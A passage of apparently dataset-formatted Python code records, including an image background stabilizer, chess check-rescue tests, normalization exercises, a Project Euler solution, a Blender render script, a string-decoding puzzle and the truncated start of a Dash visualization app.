self.BUFFER_SIZE = BUFFER_SIZE\n self.EVERY = EVERY\n self.FRAME_COUNT = frame_count\n\n def index(self, frame_index):\n return int(frame_index / (self.BUFFER_SIZE * self.EVERY))\n\n def stabilize(self):\n for deq in tqdm(range(int(self.FRAME_COUNT / (self.EVERY * self.BUFFER_SIZE)))):\n for i in range(self.BUFFER_SIZE):\n self.stream.cap.set(cv2.CAP_PROP_POS_FRAMES, (deq + 1) * i * self.EVERY)\n ret, frame = self.stream.cap.read()\n if ret:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n self.append(cv2.resize(frame, (0, 0), fx=0.5, fy=0.5))\n else:\n raise Exception(\"No frame\")\n self.background_container[deq] = self.stable_pixels()\n\n self.stream.cap.set(1, 0)\n\n def background(self, index):\n try:\n return self.background_container[index]\n except Exception as e:\n print(e, 11)\n return self.background_container[index - 1]\n\n\nclass PPStabilizator(BackgroundStabilizator):\n BUFFER_SIZE = 20\n EVERY = 10\n FPS = 0.4\n FRAME_COUNT = 1832\n\n def __init__(self, *args, BUFFER_SIZE=20, EVERY=10, **kwargs):\n print(kwargs, args)\n super().__init__(*args, **kwargs)\n self.background_container = {}\n self.pointer = {}\n self.increment = 0\n self.BUFFER_SIZE = BUFFER_SIZE\n self.EVERY = EVERY\n\n def stabilize(self):\n print(\"START\")\n for deq in tqdm(range(int(self.FRAME_COUNT / (self.EVERY * self.BUFFER_SIZE)))):\n print(deq)\n for i in range(self.BUFFER_SIZE):\n self.cap.set(1, i * self.EVERY)\n ret, frame = self.cap.read()\n if ret:\n self.append(frame)\n else:\n raise Exception(\"No frame\")\n self.background_container[deq] = self.stable_pixels()\n\n def contain(self, frame_index, frame):\n if (frame_index + 1) % self.EVERY == 0:\n self.append(frame)\n print(\"append\", frame_index)\n if (frame_index + 1) % (self.BUFFER_SIZE * self.EVERY) == 0:\n # print('generate',frame_index)\n self.background_container[self.increment] = self.stable_pixels()\n self.increment += 1\n self.pointer[frame_index] = self.increment\n\n def background(self, frame_index):\n try:\n return self.background_container[self.pointer[frame_index]]\n 
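# a missing key means no background chunk has been computed for this frame\n        # yet; fall back to the previous chunk's background below\n        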
except Exception as e:\n print(e, 11)\n return self.background_container[self.pointer[frame_index] - 1]\n","sub_path":"image_pipeline.py","file_name":"image_pipeline.py","file_ext":"py","file_size_in_byte":7406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"189767271","text":"from .Helper import *\nfrom ..Chess.ChessValidator import ChessValidator\n\ndef testing_chess_validator_king_can_be_saved():\n result = []\n chess_validator = ChessValidator()\n\n # ------\n\n board = generate_board_from_string(\"\"\"\n8|R N B Q K B N |\n7|P P P P P P P P|\n6| |\n5| k R|\n4| |\n3| |\n2|p p p p p p p p|\n1|r n b q b n r|\n\"\"\")\n \n chess_validator.to_col = 'a'\n chess_validator.to_row = 3\n chess_validator.from_col = 'a'\n chess_validator.from_row = 2\n chess_validator.board = board\n chess_validator.active_player = 0\n chess_validator.attackers = [['h', 4]]\n with suppress_stdout():\n result.append(test_result( chess_validator.validate_king_can_be_saved(),\n f'Attacked by one Rook',\n line_number(),\n Expect.TRUE))\n\n # Check the to and from spots \n with suppress_stdout():\n result.append(test_result(\n (chess_validator.to_col == 'a' and chess_validator.to_row == 3 and\n chess_validator.from_col == 'a' and chess_validator.from_row == 2 and\n chess_validator.attackers == [['h', 4]]),\n f'Correctly restoring the old spots',\n line_number(),\n Expect.TRUE))\n\n # ------\n # Now check for when he can't escape \n\n board = generate_board_from_string(\"\"\"\n8| N B N |\n7|P P P P P P P P|\n6|R |\n5| Q k R|\n4| |\n3| B K |\n2|p p p p p p p p|\n1|r n b q b n r|\n\"\"\")\n\n chess_validator.board = board\n chess_validator.attackers = [['h', 4], ['c', 4]]\n with suppress_stdout():\n result.append(test_result(\n chess_validator.validate_king_can_be_saved(),\n 'Check mate by R,Q,B,K (King cannot be saved)',\n line_number(),\n Expect.FALSE))\n\n # ------\n # And at the end test for special cases\n\n boards = []\n boards.append(generate_board_from_string(\"\"\"\n8|R N B K B N R|\n7|P P P P P P P P|\n6| |\n5| Q |\n4| |\n3| |\n2|p p p p p p p|\n1|r n b q k b n r|\n\"\"\")) # 0\n boards.append(generate_board_from_string(\"\"\"\n8|R N B K B N R|\n7|P P P P P P P P|\n6| |\n5| |\n4| |\n3| |\n2|p p p p Q p p p|\n1|r n b q k b n r|\n\"\"\")) # 1\n boards.append(generate_board_from_string(\"\"\"\n8|R N B K B N R|\n7|P P P P P P P P|\n6| |\n5| |\n4| Q|\n3| |\n2|p p p p p p|\n1|r n b q k b n r|\n\"\"\")) # 2\n boards.append(generate_board_from_string(\"\"\"\n8|R N B B N R|\n7|P P P P P P P P|\n6| |\n5| |\n4| |\n3| K |\n2|p p p Q p p|\n1|r n b q k b n r|\n\"\"\")) # 3\n boards.append(generate_board_from_string(\"\"\"\n8|R N B Q K B R|\n7|P P P P P P P P|\n6| |\n5| |\n4| |\n3| N |\n2|p p p p p p p p|\n1|r n b q k b n r|\n\"\"\")) # 4\n boards.append(generate_board_from_string(\"\"\"\n8|R N B Q K B N |\n7|P P P P P P P P|\n6| |\n5| R |\n4|r |\n3| p p |\n2|p p p k p p|\n1| n b q b n r|\n\"\"\")) # 5\n\n attackers = [\n [['e', 4]],\n [['e', 1]],\n [['h', 3]],\n [['e', 1]],\n [['f', 2]],\n [['e', 4]],\n ]\n descriptions = [\n \"Other figure stepping in between\",\n \"King attacks attacker himself\",\n \"King stepps away\",\n \"Bishop or knight attacks attacker (king can't move)\",\n \"Someone attacks knight (king can't move)\",\n \"Rook steps in (king can't move)\",\n ]\n count = 0\n for board in boards:\n chess_validator.board = board\n chess_validator.attackers = attackers[count]\n with suppress_stdout():\n result.append(test_result(\n 
chess_validator.validate_king_can_be_saved(),\n descriptions[count] + f' (board {count})',\n line_number(),\n Expect.TRUE))\n count += 1\n\n # ------\n\n result.append('> Finished')\n return result","sub_path":"Server/Testing/testing_chess_validator_king_can_be_saved.py","file_name":"testing_chess_validator_king_can_be_saved.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"387352377","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n'''boston_hosing=tf.keras.datasets.boston_housing# Load the Boston housing price dataset\n(train_x,train_y),(test_x,test_y)=boston_hosing.load_data()\n# print(train_x.shape,train_y.shape)\n\n# Data processing\nx_train=train_x[:,5]\ny_train=train_y\n\n\nx_test=test_x[:,5]\ny_test=test_y\n\n# Set hyperparameters\nlearn_rate=0.04\niter=2000\ndisplay_step=200\n\n# Set initial values for the model parameters\nnp.random.seed(612)\nw=tf.Variable(np.random.randn())\nb=tf.Variable(np.random.randn())\n\n\n# Train the model\nmse_train=[]\nmse_test=[]\n\nfor i in range(0,iter+1):\n with tf.GradientTape() as tape:\n pred_train=w*x_train+b# function whose partial derivatives are taken\n loss_train=0.5*tf.reduce_mean(tf.square(y_train-pred_train))# loss function formula\n\n pred_test = w * x_test + b # function whose partial derivatives are taken\n loss_test = 0.5 * tf.reduce_mean(tf.square(y_test - pred_test)) # loss function formula\n mse_train.append(loss_train)\n mse_test.append(loss_test)\n\n dl_dw,dl_db=tape.gradient(loss_train,[w,b])\n # Update the weights, w=w-learn_rate*dl_dw\n w.assign_sub(learn_rate*dl_dw) # tf.assign_sub(ref, value, use_locking=None, name=None) meaning: subtract value from the variable ref, i.e. ref = ref - value\n b.assign_sub(learn_rate*dl_db)\n if i % display_step==0:\n print('i:%i,Train Loss: %f,Test Loss:%f'%(i,loss_train,loss_test))\n\n # Visualization\n plt.rcParams['font.sans-serif'] = ['SimHei'] # Set the display font\n plt.subplot(1,2,1)\n plt.plot(mse_train)\n plt.subplot(1,2,2)\n plt.plot(mse_test)\nplt.show()'''\n\n\n# Multiple linear regression\n# 1-D array normalization\n\narea=np.array( [137.97, 104.50, 100.00, 124.32, 79.20, 99.00, 124.00, 114.00, 106, 138.05, 53.75, 46.91, 68.00, 63.02, 81.26,\n 86.21])\nroom=np.array([3,2,2,3,1,2,3,2,2,3,1,1,1,1,2,2])\nprint(area.shape)\n\n# Normalization: map all values into the [0,1] range; house area and room count are not on the same scale, and normalization brings them to the same scale\nx1=(area-area.min())/(area.max()-area.min())\nx2=(room-room.min())/(room.max()-room.min())\n\n# 2-D array normalization ---- loop implementation\n'''x=np.array([[3.0,10,500],\n [2.,20,200],\n [1.,30,300],\n [5.,50,100]])\nfor i in range(x.shape[1]):# x.shape[1] is the number of columns; each column holds one attribute\n x[:,i]=(x[:,i]-x[:,i].min())/(x[:,i].max()-x[:,i].min())\nprint(x)'''\n\n# ********************* Broadcasting **************\nx=np.array([[3.0,10,500],\n [2.,20,200],\n [1.,30,300],\n [5.,50,100]])\n# print(x.min(axis=0))# minimum of each column\n# print(x.max(axis=0))# maximum of each column\ndiff=x.max(axis=0)-x.min(axis=0)\n# print(diff)\n(x-x.min(axis=0))/(x.max(axis=0)-x.min(axis=0))","sub_path":"python_code/tensorflow_studay/tensorflow基础/波士顿方法预测.py","file_name":"波士顿方法预测.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"383745344","text":"#The prime factors of 13195 are 5, 7, 13 and 29.\n#What is the largest prime factor of the number 600851475143 ?\n\n#5 * 7 * 13 * 29 = 13195\n\nimport math\n\ninputVal = 600851475143\n\nnewVal = inputVal\nlistPrimes = []\n\nwhile( newVal > math.sqrt(inputVal)-1 ):\n divisor = 2\n while (True):\n divisorCheck = newVal / divisor\n if divisorCheck == int(divisorCheck):\n listPrimes.append(divisor)\n newVal = newVal / divisor\n break\n divisor += 1\nif divisorCheck == int(divisorCheck):\n listPrimes.append(divisorCheck);\n\nprint 
(max(listPrimes))","sub_path":"Python/problem003.py","file_name":"problem003.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"333593124","text":"import os\nimport random\nimport platform\nimport bpy\n# import bpy_extras\nfrom mathutils import Matrix, Vector\nimport math\nimport numpy as np\nimport scipy.io\nimport imageio\nimport glob\nimport xml.etree.ElementTree as ET\n\nfrom math import pi ,sin, cos\n\n# custom libs\nimport os.path as osp\nimport sys\nimport argparse\n\n#>>>>>>>>>>>>>>>>>>>>>>>> global <<<<<<<<<<<<<<<<<<<<<<<<<<<<#\nRENDERING_PATH = './'\nMAX_CAMERA_DIST = 2\nMAX_DEPTH = 1e8\nFACTOR_DEPTH = 0.1\n\ng_syn_light_num_lowbound = 4\ng_syn_light_num_highbound = 6\ng_syn_light_dist_lowbound = 8\ng_syn_light_dist_highbound = 12\ng_syn_light_azimuth_degree_lowbound = 0\ng_syn_light_azimuth_degree_highbound = 360\ng_syn_light_elevation_degree_lowbound = 0\ng_syn_light_elevation_degree_highbound = 90\ng_syn_light_energy_mean = 3\ng_syn_light_energy_std = 0.5\ng_syn_light_environment_energy_lowbound = 0\ng_syn_light_environment_energy_highbound = 1\n#>>>>>>>>>>>>>>>>>>>>>>>> ends here <<<<<<<<<<<<<<<<<<<<<<<<<#\n\ndef breakpoint():\n import pdb;pdb.set_trace()\n\ndef add_path(path):\n if path not in sys.path:\n sys.path.insert(0, path)\n\nclass active: \n # operations on active objects\n def rename(objName):\n bpy.context.object.name = objName\n\nclass select:\n # operations on selected objects\n # Declarative\n def scale(objName, v):\n bpy.data.objects[objName].scale = v\n # Declarative\n def location(objName, v):\n bpy.data.objects[objName].location = v\n # Declarative\n def rotation(objName, v):\n bpy.data.objects[objName].rotation_euler = v\n\n# create primitives\nclass create:\n \"\"\"Function Class for CREATING Objects\"\"\"\n def cube(objName, v=0.5):\n bpy.ops.mesh.primitive_cube_add(radius=v, location=(0, 0, 0))\n active.rename(objName)\n def sphere(objName, v=0.5):\n bpy.ops.mesh.primitive_uv_sphere_add(size=v, location=(0, 0, 0))\n active.rename(objName)\n def cone(objName, v=0.5):\n bpy.ops.mesh.primitive_cone_add(radius1=v, location=(0, 0, 0))\n active.rename(objName)\n\ndef camPosToQuaternion(cx, cy, cz):\n camDist = math.sqrt(cx * cx + cy * cy + cz * cz)\n cx = cx / camDist\n cy = cy / camDist\n cz = cz / camDist\n axis = (-cz, 0, cx)\n angle = math.acos(cy)\n a = math.sqrt(2) / 2\n b = math.sqrt(2) / 2\n w1 = axis[0]\n w2 = axis[1]\n w3 = axis[2]\n c = math.cos(angle / 2)\n d = math.sin(angle / 2)\n q1 = a * c - b * d * w1\n q2 = b * c + a * d * w1\n q3 = a * d * w2 + b * d * w3\n q4 = -b * d * w2 + a * d * w3\n return (q1, q2, q3, q4)\n\ndef quaternionFromYawPitchRoll(yaw, pitch, roll):\n c1 = math.cos(yaw / 2.0)\n c2 = math.cos(pitch / 2.0)\n c3 = math.cos(roll / 2.0)\n s1 = math.sin(yaw / 2.0)\n s2 = math.sin(pitch / 2.0)\n s3 = math.sin(roll / 2.0)\n q1 = c1 * c2 * c3 + s1 * s2 * s3\n q2 = c1 * c2 * s3 - s1 * s2 * c3\n q3 = c1 * s2 * c3 + s1 * c2 * s3\n q4 = s1 * c2 * c3 - c1 * s2 * s3\n return (q1, q2, q3, q4)\n\n\ndef camPosToQuaternion(cx, cy, cz):\n q1a = 0\n q1b = 0\n q1c = math.sqrt(2) / 2\n q1d = math.sqrt(2) / 2\n camDist = math.sqrt(cx * cx + cy * cy + cz * cz)\n cx = cx / camDist\n cy = cy / camDist\n cz = cz / camDist\n t = math.sqrt(cx * cx + cy * cy)\n tx = cx / t\n ty = cy / t\n yaw = math.acos(ty)\n if tx > 0:\n yaw = 2 * math.pi - yaw\n pitch = 0\n tmp = min(max(tx*cx + ty*cy, -1),1)\n #roll = math.acos(tx * cx + ty * cy)\n roll = math.acos(tmp)\n 
if cz < 0:\n roll = -roll\n print(\"%f %f %f\" % (yaw, pitch, roll))\n q2a, q2b, q2c, q2d = quaternionFromYawPitchRoll(yaw, pitch, roll)\n q1 = q1a * q2a - q1b * q2b - q1c * q2c - q1d * q2d\n q2 = q1b * q2a + q1a * q2b + q1d * q2c - q1c * q2d\n q3 = q1c * q2a - q1d * q2b + q1a * q2c + q1b * q2d\n q4 = q1d * q2a + q1c * q2b - q1b * q2c + q1a * q2d\n return (q1, q2, q3, q4)\n\ndef camRotQuaternion(cx, cy, cz, theta):\n theta = theta / 180.0 * math.pi\n camDist = math.sqrt(cx * cx + cy * cy + cz * cz)\n cx = -cx / camDist\n cy = -cy / camDist\n cz = -cz / camDist\n q1 = math.cos(theta * 0.5)\n q2 = -cx * math.sin(theta * 0.5)\n q3 = -cy * math.sin(theta * 0.5)\n q4 = -cz * math.sin(theta * 0.5)\n return (q1, q2, q3, q4)\n\ndef quaternionProduct(qx, qy):\n a = qx[0]\n b = qx[1]\n c = qx[2]\n d = qx[3]\n e = qy[0]\n f = qy[1]\n g = qy[2]\n h = qy[3]\n q1 = a * e - b * f - c * g - d * h\n q2 = a * f + b * e + c * h - d * g\n q3 = a * g - b * h + c * e + d * f\n q4 = a * h + b * g - c * f + d * e\n return (q1, q2, q3, q4)\n\ndef obj_lookat_positioned_camera_pos(dist, azimuth_deg, elevation_deg):\n phi = float(elevation_deg) / 180 * math.pi\n theta = float(azimuth_deg) / 180 * math.pi\n x = (dist * math.cos(theta) * math.cos(phi))\n y = (dist * math.sin(theta) * math.cos(phi))\n z = (dist * math.sin(phi))\n return (x, y, z)\n\nclass BlenderRenderer(object):\n\n def __init__(self, viewport_size_x, viewport_size_y):\n '''\n viewport_size_x, viewport_size_y: rendering viewport resolution\n '''\n # remove the default cube\n bpy.ops.object.select_pattern(pattern=\"Cube\")\n bpy.ops.object.delete()\n\n render_context = bpy.context.scene.render\n world = bpy.context.scene.world\n camera = bpy.data.objects['Camera']\n\n # set the camera postion and orientation so that it is in\n # the front of the object\n camera.location = (1, 0, 0)\n\n # render setting\n render_context.resolution_percentage = 100\n world.horizon_color = (1, 1, 1) # set background color to be white\n\n # set file name for storing temporary rendering result\n self.result_fn= '%s/render_result_%d.png' % (RENDERING_PATH, os.getpid())\n bpy.context.scene.render.filepath = self.result_fn\n\n # switch on nodes\n bpy.context.scene.use_nodes = True\n bpy.context.scene.view_settings.view_transform = 'Raw'\n tree = bpy.context.scene.node_tree\n links = tree.links\n\n # clear default nodes\n for n in tree.nodes:\n tree.nodes.remove(n)\n\n # create input render layer node\n rl = tree.nodes.new('CompositorNodeRLayers')\n\n # gamma = tree.nodes.new('CompositorNodeGamma')\n # gamma.inputs[1].default_value = 2.2\n # links.new(rl.outputs[2], gamma.inputs[0])\n\n\n # create node viewer\n v = tree.nodes.new('CompositorNodeViewer')\n links.new(rl.outputs[2], v.inputs[0]) # link Image output to Viewer input\n\n # create map value layer node\n # map = tree.nodes.new(type=\"CompositorNodeMapValue\")\n # map.size = [FACTOR_DEPTH]\n # map.use_min = True\n # map.min = [0]\n # map.use_max = True\n # map.max = [256]\n # links.new(rl.outputs[2], map.inputs[0])\n\n # create output node\n fileOutput = tree.nodes.new(type=\"CompositorNodeOutputFile\")\n fileOutput.base_path = \"./new_data/0000\"\n fileOutput.format.file_format = 'OPEN_EXR'\n fileOutput.format.color_depth= '32'\n fileOutput.file_slots[0].path = 'depth#'\n # links.new(map.outputs[0], fileOutput.inputs[0])\n links.new(rl.outputs[2], fileOutput.inputs[0])\n # links.new(gamma.outputs[0], fileOutput.inputs[0])\n\n self.render_context = render_context\n\n self.node_tree = tree\n self.fileOutput = 
fileOutput\n\n self.camera = camera\n self.model_loaded = False\n self.render_context.resolution_x = viewport_size_x\n self.render_context.resolution_y = viewport_size_y\n self.render_context.use_antialiasing = False\n\n self.dirname = 'new_data/0000'\n\n def _set_lighting(self, light_info=[], environment_energy=None):\n # clear default lights\n bpy.ops.object.select_by_type(type='LAMP')\n bpy.ops.object.delete(use_global=False)\n\n # set environment lighting\n bpy.context.scene.world.light_settings.use_environment_light = True\n bpy.context.scene.world.light_settings.environment_color = 'PLAIN'\n\n # if light info is specified\n if len(light_info):\n bpy.context.scene.world.light_settings.environment_energy = environment_energy\n for info in light_info:\n light_azimuth_deg = info[0]\n light_elevation_deg = info[1]\n light_dist = info[2]\n light_energy = info[3]\n\n lx, ly, lz = obj_lookat_positioned_camera_pos(light_dist, light_azimuth_deg, light_elevation_deg)\n bpy.ops.object.lamp_add(type='POINT', view_align=False, location=(lx, ly, lz))\n bpy.data.objects['Point'].data.energy = light_energy\n else: # randomly get a new set of lights\n bpy.context.scene.world.light_settings.environment_energy = np.random.uniform(\n g_syn_light_environment_energy_lowbound, g_syn_light_environment_energy_highbound)\n\n # set point lights\n num_light = random.randint(g_syn_light_num_lowbound,g_syn_light_num_highbound)\n print(num_light)\n light_info = np.zeros((num_light, 4), dtype=np.float32)\n for i in range(num_light):\n light_azimuth_deg = np.random.uniform(g_syn_light_azimuth_degree_lowbound, g_syn_light_azimuth_degree_highbound)\n light_elevation_deg = np.random.uniform(g_syn_light_elevation_degree_lowbound, g_syn_light_elevation_degree_highbound)\n light_dist = np.random.uniform(g_syn_light_dist_lowbound, g_syn_light_dist_highbound)\n lx, ly, lz = obj_lookat_positioned_camera_pos(light_dist, light_azimuth_deg, light_elevation_deg)\n bpy.ops.object.lamp_add(type='POINT', view_align = False, location=(lx, ly, lz))\n light_energy = np.random.normal(g_syn_light_energy_mean, g_syn_light_energy_std)\n bpy.data.objects['Point'].data.energy = light_energy\n\n light_info[i, 0] = light_azimuth_deg\n light_info[i, 1] = light_elevation_deg\n light_info[i, 2] = light_dist\n light_info[i, 3] = light_energy\n\n self.environment_energy = bpy.context.scene.world.light_settings.environment_energy\n self.light_info = light_info\n\n\n def setViewpoint(self, azimuth, altitude, yaw, distance_ratio, fov, lookat_position=None):\n\n cx, cy, cz = obj_lookat_positioned_camera_pos(distance_ratio * MAX_CAMERA_DIST, azimuth, altitude)\n q1 = camPosToQuaternion(cx, cy, cz)\n q2 = camRotQuaternion(cx, cy, cz, yaw)\n q = quaternionProduct(q2, q1)\n\n if lookat_position is not None:\n self.camera.location[0] = cx + lookat_position[0]\n self.camera.location[1] = cy + lookat_position[1]\n self.camera.location[2] = cz + lookat_position[2]\n else:\n self.camera.location[0] = cx\n self.camera.location[1] = cy\n self.camera.location[2] = cz\n\n self.camera.rotation_mode = 'QUATERNION'\n self.camera.rotation_quaternion[0] = q[0]\n self.camera.rotation_quaternion[1] = q[1]\n self.camera.rotation_quaternion[2] = q[2]\n self.camera.rotation_quaternion[3] = q[3]\n\n self.azimuth = azimuth\n self.elevation = altitude\n self.tilt = yaw\n self.distance = distance_ratio * MAX_CAMERA_DIST\n\n def setTransparency(self, transparency='SKY'):\n \"\"\" transparency is either 'SKY', 'TRANSPARENT'\n If set 'SKY', render background using sky 
color.\"\"\"\n self.render_context.alpha_mode = transparency\n\n def makeMaterial(self, name, diffuse, specular, alpha):\n mat = bpy.data.materials.new(name)\n mat.diffuse_color = diffuse\n mat.diffuse_shader = 'LAMBERT'\n mat.diffuse_intensity = 1.0\n mat.specular_color = specular\n mat.specular_shader = 'COOKTORR'\n mat.specular_intensity = 0.5\n mat.alpha = alpha\n mat.ambient = 1\n mat.use_transparency = True\n mat.transparency_method = 'Z_TRANSPARENCY'\n mat.use_shadeless = True\n mat.use_face_texture = False\n return mat\n\n def selectModel(self):\n bpy.ops.object.select_all(action='DESELECT')\n bpy.ops.object.select_pattern(pattern=\"Camera\")\n bpy.ops.object.select_all(action='INVERT')\n\n def printSelection(self):\n print(bpy.context.selected_objects)\n\n def clearModel(self):\n self.selectModel()\n bpy.ops.object.delete()\n\n # The meshes still present after delete\n for item in bpy.data.meshes:\n bpy.data.meshes.remove(item)\n for item in bpy.data.materials:\n bpy.data.materials.remove(item)\n\n def loadModel(self, file_path):\n self.model_loaded = True\n try:\n if file_path.endswith('obj'):\n bpy.ops.import_scene.obj(filepath=file_path)\n elif file_path.endswith('3ds'):\n bpy.ops.import_scene.autodesk_3ds(filepath=file_path)\n elif file_path.endswith('dae'):\n # Must install OpenCollada. Please read README.md\n bpy.ops.wm.collada_import(filepath=file_path)\n else:\n self.model_loaded = False\n raise Exception(\"Loading failed: %s\" % (file_path))\n except Exception:\n self.model_loaded = False\n\n def render(self, image_path=os.path.join(RENDERING_PATH, 'tmp.png')):\n '''\n Render the object\n '''\n self.result_fn = image_path\n bpy.context.scene.render.filepath = image_path\n\n bpy.ops.render.render(write_still=True) # save straight to file\\\n\n def vertex_paint(self, image_path=os.path.join(RENDERING_PATH, 'tmp.png'), classes=None):\n '''\n Render the object\n '''\n if not self.model_loaded:\n print('Model not loaded.')\n return\n print('entering NOCS rendering mode')\n i = 0\n for item in bpy.data.objects:\n if item.type == 'MESH':\n if item.name == 'plane':\n mat = self.makeMaterial('transparent', (1, 1, 1), (0, 0, 0), 0)\n else:\n item.select = True\n vcol_layer = item.data.vertex_colors.active\n\n assert len(item.data.vertex_colors)!=0\n vcol_layer = item.data.vertex_colors[-1]\n item.data.vertex_colors.active = vcol_layer\n item.data.update()\n\n mat = bpy.data.materials.new('material_color_{}'.format(i))\n i += 1\n\n mat.use_vertex_color_light = False\n mat.use_shadeless = True\n mat.use_face_texture = False\n mat.use_vertex_color_paint = True\n\n # mat.diffuse_color = [0, 0, 0]\n # mat.diffuse_shader = 'LAMBERT'\n # mat.diffuse_intensity = 1.0\n # mat.specular_color = [0, 0, 0]\n # mat.specular_shader = 'COOKTORR'\n # mat.specular_intensity = 0.5\n # mat.alpha = 1\n # mat.ambient = 1\n # mat.use_transparency = True\n # mat.transparency_method = 'Z_TRANSPARENCY'\n \n if item.data.materials:\n for i in range(len(item.data.materials)):\n item.data.materials[i] = mat\n else:\n item.data.materials.append(mat)\n item.active_material = mat\n\n \n # bpy.ops.object.mode_set(mode='VERTEX_PAINT')\n self.result_fn = image_path\n bpy.context.scene.render.filepath = image_path\n self.render_context.use_textures = False\n bpy.ops.render.render(write_still=True) # save straight to file\\\n\ndef main():\n # initialize the blender render\n renderer = BlenderRenderer(640, 480)\n renderer.clearModel()\n renderer._set_lighting()\n # \n dirname = './'\n\n # create a Cube\n 
create.cube('PerfectCube')\n renderer.model_loaded = True\n \n # material for masks\n materials = []\n synset_colors = [(1, 0, 0), (0, 1, 0), (0, 0, 1), (1, 1, 0), (1, 0, 1), (0, 1, 1), (1, 1, 1)]\n for i in range(len(synset_colors)):\n materials.append(renderer.makeMaterial('transparent', synset_colors[i], (0, 0, 0), 1))\n\n # set camera view points \n view_num = 1\n distance = 2.0\n lookat_position = [0, 0, 0]\n viewpoints = np.zeros((view_num, 3))\n viewpoints[..., 0] = (np.random.rand(view_num) - 0.5) * 0 + 45 # azimuth\n viewpoints[..., 1] = (np.random.rand(view_num) - 0.5) * 0 + 45 # elevation\n viewpoints[..., 2] = (np.random.rand(view_num) - 0.5) * 0 # tilt\n\n # assign vertex colors by coordinates\n for item in bpy.data.objects:\n if item.type == 'MESH': \n item.select = True\n if len(item.data.vertex_colors)==0:\n print('---using material from ', item.name)\n vcol_layer = item.data.vertex_colors.new()\n for loop_index, loop in enumerate(item.data.loops):\n loop_vert_index = loop.vertex_index\n color = item.data.vertices[loop_vert_index].co\n # color = Vector([0.5, 0.5, 0.5])\n # color = (item_color.data.vertices[loop_vert_index].co - Vector(XYZ_c[:, mesh[item_color.name]].tolist())) / XYZ_l[mesh[item_color.name]] + Vector([0.5, 0.5, 0.5])\n vcol_layer.data[loop_index].color = color\n else:\n vcol_layer = item.data.vertex_colors.active\n item.select = False\n\n # assign mask colors to all the materials of all the models\n for item in bpy.data.objects:\n if item.type == 'MESH':\n mat = materials[0]\n if item.data.materials:\n for i in range(len(item.data.materials)):\n # item.data.materials[i] = mat\n item.data.materials[i].diffuse_color = mat.diffuse_color\n item.data.materials[i].diffuse_shader = mat.diffuse_shader\n item.data.materials[i].diffuse_intensity = mat.diffuse_intensity\n item.data.materials[i].specular_color = mat.specular_color\n item.data.materials[i].specular_shader = mat.specular_shader\n item.data.materials[i].specular_intensity = mat.specular_intensity\n item.data.materials[i].alpha = mat.alpha\n item.data.materials[i].ambient = mat.ambient\n item.data.materials[i].use_transparency = mat.use_transparency\n item.data.materials[i].transparency_method = mat.transparency_method\n item.data.materials[i].use_shadeless = mat.use_shadeless\n item.data.materials[i].use_face_texture = mat.use_face_texture\n else:\n item.data.materials.append(mat)\n\n # render mask\n for i in range(view_num):\n azimuth = viewpoints[i][0]\n elevation = viewpoints[i][1]\n tilt = viewpoints[i][2]\n\n # set viewpoint\n renderer.setViewpoint(azimuth, elevation, tilt, distance, 25, lookat_position=lookat_position)\n # set transparency\n renderer.setTransparency('TRANSPARENT')\n\n # rendering\n filename = dirname + '/mask/%04d.png' % i\n renderer.render_context.use_textures = False\n renderer.render(filename)\n\n # render coordinate map\n for i in range(view_num):\n azimuth = viewpoints[i][0]\n elevation = viewpoints[i][1]\n tilt = viewpoints[i][2]\n\n # set viewpoint\n renderer.setViewpoint(azimuth, elevation, tilt, distance, 25, lookat_position=lookat_position)\n\n # set transparency\n renderer.setTransparency('TRANSPARENT')\n\n # rendering\n filename = dirname + '/label/%04d.png' % i\n renderer.render_context.use_textures = False\n renderer.vertex_paint(filename)\n # renderer.clearModel()\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"tools/blender_unit_test.py","file_name":"blender_unit_test.py","file_ext":"py","file_size_in_byte":20116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"644720946","text":"'''\nThe Spy Life\n\nYou are a secret agent, and you receive an encrypted message that needs to be decoded. The code that is being used flips the message backwards and inserts non-alphabetic characters in the message to make it hard to decipher.\n\nTask: \nCreate a program that will take the encoded message, flip it around, remove any characters that are not a letter or a space, and output the hidden message.\n\nInput Format: \nA string of characters that represent the encoded message.\n\nOutput Format: \nA string of character that represent the intended secret message.\n\nSample Input: \nd89%l++5r19o7W *o=l645le9H\n\nSample Output: \nHello World\n\n'''\n\n\n\n\nimport re\nmessage=str(input())\nflipped_input=message[::-1]\n#print(flipped_input)\noutput=\"\"\nfor i in flipped_input:\n\tregex=re.compile(\"[^\\sa-zA-Z]\")\n\tclean=regex.sub(\"\", i)\n\toutput+=clean\nprint(output)\n","sub_path":"Spy_life.py","file_name":"Spy_life.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"142157480","text":"import dash_core_components as dcc\nfrom dash_core_components.Dropdown import Dropdown\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.graph_objs as go\nfrom django_plotly_dash import DjangoDash\nimport pandas as pd\nimport plotly.express as px\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = DjangoDash('VisualApp', external_stylesheets=external_stylesheets)\n\n\n\ndata = pd.read_csv(\"static/final.csv\")\nfeatures = data.columns.to_list()\n\nfig = px.histogram(data, x=features[1])\n\nbar1 = px.bar(data,\n x=\"Country\",\n y=[\"Yearly Pre-Intervention Rate\",\"Yearly Post Intervention Rate\"],\n title=\"Yearly Suicide Counts by Country\",\n barmode=\"group\")\nbar2 = px.bar(data,\n x=\"Country\",\n y=[\"Pre-Intervention Suicide\",\"Post-Intervention Suicide\"],\n title=\"Total Suicide Counts by Country\",\n barmode=\"group\")\nbar3 = px.bar(data,\n x=\"Phones\",\n y=[\"Yearly Pre-Intervention Rate\",\"Yearly Post Intervention Rate\"],\n title=\"Phones\")\nbar4 = px.bar(data,\n x=\"Signs with Emergency Contact\",\n y=[\"Yearly Pre-Intervention 